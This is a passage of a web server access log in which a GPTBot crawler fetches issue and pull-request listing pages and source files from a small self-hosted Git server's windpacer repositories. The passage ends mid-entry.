git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10083] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:19:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 74.7.227.38] [Length 11790] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:19:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 74.7.227.38] [Length 11777] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:19:01:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:19:01:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md?display=source" [Client 74.7.227.38] [Length 15974] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:19:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10092] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:01:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10265] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" -[17/Feb/2026:19:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:01:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe?display=rendered" [Client 74.7.227.38] [Length 11097] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" -[17/Feb/2026:19:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:01:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:01:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:01:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:01:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:01:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:01:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:01:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:01:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:19:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9939] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:19:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11262] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:19:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat?display=source" [Client 74.7.227.38] [Length 14815] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:19:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md?display=rendered" [Client 74.7.227.38] [Length 17347] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:19:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec?display=source" [Client 74.7.227.38] [Length 13502] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:19:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py?display=source" [Client 74.7.227.38] [Length 15362] [Gzip 4.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:19:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log?display=source" [Client 74.7.227.38] [Length 11433] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:19:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_deps?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:19:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:19:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=open&type=all" -[17/Feb/2026:19:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9958] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=all&type=all" -[17/Feb/2026:19:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:02:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:02:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 